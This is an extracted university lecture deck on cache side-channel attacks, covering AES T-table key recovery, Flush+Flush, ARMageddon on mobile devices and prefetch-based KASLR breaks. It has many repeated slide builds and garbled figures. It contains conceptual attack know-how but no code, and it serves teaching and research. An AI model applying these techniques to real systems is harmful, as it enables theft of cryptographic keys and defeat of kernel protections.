� Cache hit ratio 0% (no cache hits)

� One 4096 byte memory block:

� Cache hit ratio of 92%

� Cache hits depend on key value and plaintext value

� The T-Tables

Page 123: Side-Channel Security - Chapter 2: Cache Template Attacks

Attack 4: AES T-Table Template Attack

AES T-Table implementation from OpenSSL 1.0.2

� Known-plaintext attack

� Events: encryption with only one fixed key byte

� Profile each event

� Exploitation phase:

� Eliminate key candidates� Reduction of key space in first-round attack:

� 64 bits after 16–160 encryptions

� State of the art: full key recovery after 30000 encryptions

Page 124: Side-Channel Security - Chapter 2: Cache Template Attacks

Attack 4: AES T-Table Template Attack

AES T-Table implementation from OpenSSL 1.0.2

� Known-plaintext attack

� Events: encryption with only one fixed key byte

� Profile each event

� Exploitation phase:

� Eliminate key candidates� Reduction of key space in first-round attack:

� 64 bits after 16–160 encryptions

� State of the art: full key recovery after 30000 encryptions

Page 125: Side-Channel Security - Chapter 2: Cache Template Attacks

Attack 4: AES T-Table Template Attack

AES T-Table implementation from OpenSSL 1.0.2

� Known-plaintext attack

� Events: encryption with only one fixed key byte

� Profile each event

� Exploitation phase:

� Eliminate key candidates

� Reduction of key space in first-round attack:

� 64 bits after 16–160 encryptions

� State of the art: full key recovery after 30000 encryptions

Page 126: Side-Channel Security - Chapter 2: Cache Template Attacks

Attack 4: AES T-Table Template Attack

AES T-Table implementation from OpenSSL 1.0.2

� Known-plaintext attack

� Events: encryption with only one fixed key byte

� Profile each event

� Exploitation phase:

� Eliminate key candidates� Reduction of key space in first-round attack:

� 64 bits after 16–160 encryptions

� State of the art: full key recovery after 30000 encryptions

Page 127: Side-Channel Security - Chapter 2: Cache Template Attacks

Attack 4: AES T-Table Template Attack

AES T-Table implementation from OpenSSL 1.0.2

� Known-plaintext attack

� Events: encryption with only one fixed key byte

� Profile each event

� Exploitation phase:

� Eliminate key candidates� Reduction of key space in first-round attack:

� 64 bits after 16–160 encryptions

� State of the art: full key recovery after 30000 encryptions

Page 128: Side-Channel Security - Chapter 2: Cache Template Attacks

Attack 4: AES T-Table Template

k0 = 0x00 k0 = 0x55

(transposed)

Page 129: Side-Channel Security - Chapter 2: Cache Template Attacks

Conclusion

� Novel technique to find any cache side-channel leakage

� Attacks

� Detect vulnerabilities

� Works on virtually all Intel CPUs

� Works even with unknown binaries

� Marks a change of perspective:

� Large scale analysis of binaries

� Large scale automated attacks

Page 130: Side-Channel Security - Chapter 2: Cache Template Attacks

Conclusion

� Novel technique to find any cache side-channel leakage

� Attacks

� Detect vulnerabilities

� Works on virtually all Intel CPUs

� Works even with unknown binaries

� Marks a change of perspective:

� Large scale analysis of binaries

� Large scale automated attacks

Page 131: Side-Channel Security - Chapter 2: Cache Template Attacks

Conclusion

� Novel technique to find any cache side-channel leakage

� Attacks

� Detect vulnerabilities

� Works on virtually all Intel CPUs

� Works even with unknown binaries

� Marks a change of perspective:

� Large scale analysis of binaries

� Large scale automated attacks

Page 132: Side-Channel Security - Chapter 2: Cache Template Attacks

Conclusion

� Novel technique to find any cache side-channel leakage

� Attacks

� Detect vulnerabilities

� Works on virtually all Intel CPUs

� Works even with unknown binaries

� Marks a change of perspective:

� Large scale analysis of binaries

� Large scale automated attacks

Page 133: Side-Channel Security - Chapter 2: Cache Template Attacks

Evict+Reload

� Variant of Flush+Reload with cache eviction instead of clflush

� Works on ARMv7

� Applicable to millions of devices

� Cache Template Attacks using Evict+Reload

� ARMageddon: Last-Level Cache Attacks on Mobile Devices [4]

Page 134: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush: Motivation

� cache attacks → many cache misses

� detect via performance counters

→ good idea, but is it good enough?

� causing a cache flush 6= causing a cache miss

Page 135: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush: Motivation

� cache attacks → many cache misses

� detect via performance counters

→ good idea, but is it good enough?

� causing a cache flush 6= causing a cache miss

Page 136: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush: Motivation

� cache attacks → many cache misses

� detect via performance counters

→ good idea, but is it good enough?

� causing a cache flush 6= causing a cache miss

Page 137: Side-Channel Security - Chapter 2: Cache Template Attacks

clflush execution time

100 120 140 160 180 200

0%

25%

50%

75%

100%

EXECUTION TIME (IN CYCLES)

NU

MB

ER

OF

CA

SE

S

Sandy Hit Sandy MissIvy Hit Ivy Miss

Haswell Hit Haswell Miss

Page 138: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush

Attackeraddress space Cache

Victimaddress space

Page 139: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush

Attackeraddress space Cache

Victimaddress space

cached cached

Page 140: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush

Attackeraddress space Cache

Victimaddress space

flushes

Page 141: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush

Attackeraddress space Cache

Victimaddress space

loads data

Page 142: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush

Attackeraddress space Cache

Victimaddress space

flushes (slow)

Page 143: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush: Conclusion

� attacker causes no direct cache misses

→ fast

→ stealthy

� same side channel targets as Flush+Reload

� 496 KB/s covert channel

Page 144: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush: Conclusion

� attacker causes no direct cache misses

→ fast

→ stealthy

� same side channel targets as Flush+Reload

� 496 KB/s covert channel

Page 145: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush: Conclusion

� attacker causes no direct cache misses

→ fast

→ stealthy

� same side channel targets as Flush+Reload

� 496 KB/s covert channel

Page 146: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache Attacks on mobile devices?

� powerful cache attacks on Intel x86 in the last 10 years

� nothing like Flush+Reload or Prime+Probe on mobile devices

→ why?

Page 147: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache Attacks on mobile devices?

� powerful cache attacks on Intel x86 in the last 10 years

� nothing like Flush+Reload or Prime+Probe on mobile devices

→ why?

Page 148: Side-Channel Security - Chapter 2: Cache Template Attacks

ARMageddon in a nutshell

1. no flush instruction

→ Evict+Reload

2. pseudo-random replacement → eviction strategies from Rowhammer.js

3. cycle counters require root → new timing methods

4. last-level caches not inclusive → let L1 spill to LLC

5. multiple CPUs → remote fetches + flushes

Page 149: Side-Channel Security - Chapter 2: Cache Template Attacks

ARMageddon in a nutshell

1. no flush instruction → Evict+Reload

2. pseudo-random replacement → eviction strategies from Rowhammer.js

3. cycle counters require root → new timing methods

4. last-level caches not inclusive → let L1 spill to LLC

5. multiple CPUs → remote fetches + flushes

Page 150: Side-Channel Security - Chapter 2: Cache Template Attacks

ARMageddon in a nutshell

1. no flush instruction → Evict+Reload

2. pseudo-random replacement

→ eviction strategies from Rowhammer.js

3. cycle counters require root → new timing methods

4. last-level caches not inclusive → let L1 spill to LLC

5. multiple CPUs → remote fetches + flushes

Page 151: Side-Channel Security - Chapter 2: Cache Template Attacks

ARMageddon in a nutshell

1. no flush instruction → Evict+Reload

2. pseudo-random replacement → eviction strategies from Rowhammer.js

3. cycle counters require root → new timing methods

4. last-level caches not inclusive → let L1 spill to LLC

5. multiple CPUs → remote fetches + flushes

Page 152: Side-Channel Security - Chapter 2: Cache Template Attacks

ARMageddon in a nutshell

1. no flush instruction → Evict+Reload

2. pseudo-random replacement → eviction strategies from Rowhammer.js

3. cycle counters require root

→ new timing methods

4. last-level caches not inclusive → let L1 spill to LLC

5. multiple CPUs → remote fetches + flushes

Page 153: Side-Channel Security - Chapter 2: Cache Template Attacks

ARMageddon in a nutshell

1. no flush instruction → Evict+Reload

2. pseudo-random replacement → eviction strategies from Rowhammer.js

3. cycle counters require root → new timing methods

4. last-level caches not inclusive → let L1 spill to LLC

5. multiple CPUs → remote fetches + flushes

Page 154: Side-Channel Security - Chapter 2: Cache Template Attacks

ARMageddon in a nutshell

1. no flush instruction → Evict+Reload

2. pseudo-random replacement → eviction strategies from Rowhammer.js

3. cycle counters require root → new timing methods

4. last-level caches not inclusive

→ let L1 spill to LLC

5. multiple CPUs → remote fetches + flushes

Page 155: Side-Channel Security - Chapter 2: Cache Template Attacks

ARMageddon in a nutshell

1. no flush instruction → Evict+Reload

2. pseudo-random replacement → eviction strategies from Rowhammer.js

3. cycle counters require root → new timing methods

4. last-level caches not inclusive → let L1 spill to LLC

5. multiple CPUs → remote fetches + flushes

Page 156: Side-Channel Security - Chapter 2: Cache Template Attacks

ARMageddon in a nutshell

1. no flush instruction → Evict+Reload

2. pseudo-random replacement → eviction strategies from Rowhammer.js

3. cycle counters require root → new timing methods

4. last-level caches not inclusive → let L1 spill to LLC

5. multiple CPUs

→ remote fetches + flushes

Page 157: Side-Channel Security - Chapter 2: Cache Template Attacks

ARMageddon in a nutshell

1. no flush instruction → Evict+Reload

2. pseudo-random replacement → eviction strategies from Rowhammer.js

3. cycle counters require root → new timing methods

4. last-level caches not inclusive → let L1 spill to LLC

5. multiple CPUs → remote fetches + flushes

Page 158: Side-Channel Security - Chapter 2: Cache Template Attacks

ARMageddon in a nutshell

1. no flush instruction → Evict+Reload

2. pseudo-random replacement → eviction strategies from Rowhammer.js

3. cycle counters require root → new timing methods

4. last-level caches not inclusive → let L1 spill to LLC

5. multiple CPUs → remote fetches + flushes

Page 159: Side-Channel Security - Chapter 2: Cache Template Attacks

ARMageddon Demo

Page 160: Side-Channel Security - Chapter 2: Cache Template Attacks

Prefetch Side-Channel Attacks

Page 161: Side-Channel Security - Chapter 2: Cache Template Attacks

Overview

� prefetch instructions don’t check privileges

� prefetch instructions leak timing information

exploit this to:

� locate a driver in kernel = defeat KASLR

� translate virtual to physical addresses

Page 162: Side-Channel Security - Chapter 2: Cache Template Attacks

Overview

� prefetch instructions don’t check privileges

� prefetch instructions leak timing information

exploit this to:

� locate a driver in kernel = defeat KASLR

� translate virtual to physical addresses

Page 163: Side-Channel Security - Chapter 2: Cache Template Attacks

Intel being overspecific

NOTE

Using the PREFETCH instruction is recommended only if data does not fit in

cache. Use of software prefetch should be limited to memory addresses that are

managed or owned within the application context. Prefetching to addresses that

are not mapped to physical pages can experience non-deterministic performance

penalty. For example specifying a NULL pointer (0L) as address for a prefetch

can cause long delays.

Page 164: Side-Channel Security - Chapter 2: Cache Template Attacks

Intel being overspecific

NOTE

Using the PREFETCH instruction is recommended only if data does not fit in

cache.

Use of software prefetch should be limited to memory addresses that are

managed or owned within the application context. Prefetching to addresses that

are not mapped to physical pages can experience non-deterministic performance

penalty. For example specifying a NULL pointer (0L) as address for a prefetch

can cause long delays.

Page 165: Side-Channel Security - Chapter 2: Cache Template Attacks

Intel being overspecific

NOTE

Using the PREFETCH instruction is recommended only if data does not fit in

cache. Use of software prefetch should be limited to memory addresses that are

managed or owned within the application context.

Prefetching to addresses that

are not mapped to physical pages can experience non-deterministic performance

penalty. For example specifying a NULL pointer (0L) as address for a prefetch

can cause long delays.

Page 166: Side-Channel Security - Chapter 2: Cache Template Attacks

Intel being overspecific

NOTE

Using the PREFETCH instruction is recommended only if data does not fit in

cache. Use of software prefetch should be limited to memory addresses that are

managed or owned within the application context. Prefetching to addresses that

are not mapped to physical pages can experience non-deterministic performance

penalty.

For example specifying a NULL pointer (0L) as address for a prefetch

can cause long delays.

Page 167: Side-Channel Security - Chapter 2: Cache Template Attacks

Intel being overspecific

NOTE

Using the PREFETCH instruction is recommended only if data does not fit in

cache. Use of software prefetch should be limited to memory addresses that are

managed or owned within the application context. Prefetching to addresses that

are not mapped to physical pages can experience non-deterministic performance

penalty. For example specifying a NULL pointer (0L) as address for a prefetch

can cause long delays.

Page 168: Side-Channel Security - Chapter 2: Cache Template Attacks

CPU Caches

Memory (DRAM) is slow compared to the CPU

� buffer frequently used memory

� every memory reference goes through the cache

� based on physical addresses

Page 169: Side-Channel Security - Chapter 2: Cache Template Attacks

Memory Access Latency

50 100 150 200 250 300 350 400100

101

102

103

104

105

106

107

Access time in cycles

Num

ber

ofac

cess

escache hits cache misses

Page 170: Side-Channel Security - Chapter 2: Cache Template Attacks

Unprivileged cache maintainance

Optimize cache usage:

� prefetch: suggest CPU to load data into cache

� clflush: throw out data from all caches

... based on virtual addresses

Page 171: Side-Channel Security - Chapter 2: Cache Template Attacks

Software prefetching

prefetch instructions are somewhat unusual

� hints – can be ignored by the CPU

� do not check privileges or cause exceptions

but they do need to translate virtual to physical

Page 172: Side-Channel Security - Chapter 2: Cache Template Attacks

Kernel must be mapped in every address space

Today’s operating systems:

Shared address space

User memory Kernel memory0 −1

context switch

Page 173: Side-Channel Security - Chapter 2: Cache Template Attacks

Address translation on x86-64

PML4I (9 b) PDPTI (9 b) PDI (9 b) PTI (9 b) Offset (12 b)

48-bit virtual address

CR3PML4

PML4E 0

PML4E 1···

#PML4I···

PML4E 511

PDPT

PDPTE 0

PDPTE 1···

#PDPTI···

PDPTE 511

Page Directory

PDE 0

PDE 1···

PDE #PDI···

PDE 511

Page Table

PTE 0

PTE 1···

PTE #PTI···

PTE 511

4 KiB Page

Byte 0

Byte 1···

Offset···

Byte 4095

Page 174: Side-Channel Security - Chapter 2: Cache Template Attacks

Address Translation Caches

Core 0

ITLB DTLB

PDE cache

PDPTE cache

PML4E cache

Core 1

ITLB DTLB

PDE cache

PDPTE cache

PML4E cache

Page table structures insystem memory (DRAM)

Lookup

direction

Page 175: Side-Channel Security - Chapter 2: Cache Template Attacks

Address Space Layout Randomization (ASLR)

Process A

0 −1

Process B

0 −1

Process C

0 −1

Same library – different offset!

Page 176: Side-Channel Security - Chapter 2: Cache Template Attacks

Address Space Layout Randomization (ASLR)

Process A

0 −1

Process B

0 −1

Process C

0 −1

Same library – different offset!

Page 177: Side-Channel Security - Chapter 2: Cache Template Attacks

Kernel Address Space Layout Randomization (KASLR)

Process A

0 −1

Process B

0 −1

Process C

0 −1

Same driver – different offset!

Page 178: Side-Channel Security - Chapter 2: Cache Template Attacks

Kernel Address Space Layout Randomization (KASLR)

Process A

0 −1

Process B

0 −1

Process C

0 −1

Same driver – different offset!

Page 179: Side-Channel Security - Chapter 2: Cache Template Attacks

Kernel direct-physical map

Virtual address spaceUser Kernel

Physical memory

0

0 max. phys.

247 −247 −1

direct

map

OS X, Linux, BSD, Xen PVM (Amazon EC2)

Page 180: Side-Channel Security - Chapter 2: Cache Template Attacks

Kernel direct-physical map

Virtual address spaceUser Kernel

Physical memory

0

0 max. phys.

247 −247 −1

direct

map

OS X, Linux, BSD, Xen PVM (Amazon EC2)

Page 181: Side-Channel Security - Chapter 2: Cache Template Attacks

Translation-Level Oracle

PDPT PD PT cached P. uncached P.

200

300

400

230246

222

181

383

Mapping level

Exe

cuti

onti

me

incy

cles

Page 182: Side-Channel Security - Chapter 2: Cache Template Attacks

Address-Translation Oracle

User space Cache

Kernel space

Page 183: Side-Channel Security - Chapter 2: Cache Template Attacks

Address-Translation Oracle

User space Cache

Kernel space

cached

cached

Page 184: Side-Channel Security - Chapter 2: Cache Template Attacks

Address-Translation Oracle

User space Cache

Kernel space

flushclflush

Page 185: Side-Channel Security - Chapter 2: Cache Template Attacks

Address-Translation Oracle

User space Cache

Kernel space

load

prefetch

Page 186: Side-Channel Security - Chapter 2: Cache Template Attacks

Address-Translation Oracle

User space Cache

Kernel space

reload (cache hit)

load

Page 187: Side-Channel Security - Chapter 2: Cache Template Attacks

Timing the prefetch instruction

The CPU may reorder instructions

instruction 1

cpuid

instruction 2

cpuid

instruction 3

but not over cpuid!

Page 188: Side-Channel Security - Chapter 2: Cache Template Attacks

Breaking KASLR with Prefetch

-16 -8 0 8 16 24 32 40100

200

300

400

500

Kernel offset [MB]

Pre

fetc

hti

me

Page 189: Side-Channel Security - Chapter 2: Cache Template Attacks

Side-Channel Security

Chapter 2: Cache Template Attacks

Daniel Gruss

March 9, 2021

Graz University of Technology

Page 190: Side-Channel Security - Chapter 2: Cache Template Attacks

References

[1] Gruss, D., Maurice, C., Wagner, K., and Mangard, S. (2016). Flush+Flush:

A Fast and Stealthy Cache Attack. In DIMVA.

[2] Gruss, D., Spreitzer, R., and Mangard, S. (2015). Cache Template Attacks:

Automating Attacks on Inclusive Last-Level Caches. In USENIX Security

Symposium.

[3] Inci, M. S., Gulmezoglu, B., Irazoqui, G., Eisenbarth, T., and Sunar, B.

(2015). Seriously, get off my cloud! cross-vm rsa key recovery in a public

cloud. Cryptology ePrint Archive, Report 2015/898.

[4] Lipp, M., Gruss, D., Spreitzer, R., Maurice, C., and Mangard, S. (2016).

ARMageddon: Cache Attacks on Mobile Devices. In USENIX Security

Symposium.

Page 191: Side-Channel Security - Chapter 2: Cache Template Attacks

[5] Liu, F., Yarom, Y., Ge, Q., Heiser, G., and Lee, R. B. (2015). Last-Level

Cache Side-Channel Attacks are Practical. In S&P.

[6] Maurice, C., Le Scouarnec, N., Neumann, C., Heen, O., and Francillon, A.

(2015). Reverse Engineering Intel Complex Addressing Using Performance

Counters. In RAID.

[7] Maurice, C., Weber, M., Schwarz, M., Giner, L., Gruss, D., Alberto Boano,

C., Mangard, S., and Romer, K. (2017). Hello from the Other Side: SSH over

Robust Cache Covert Channels in the Cloud. In NDSS.

[8] Yarom, Y., Ge, Q., Liu, F., Lee, R. B., and Heiser, G. (2015). Mapping the

Intel Last-Level Cache. Cryptology ePrint Archive, Report 2015/905.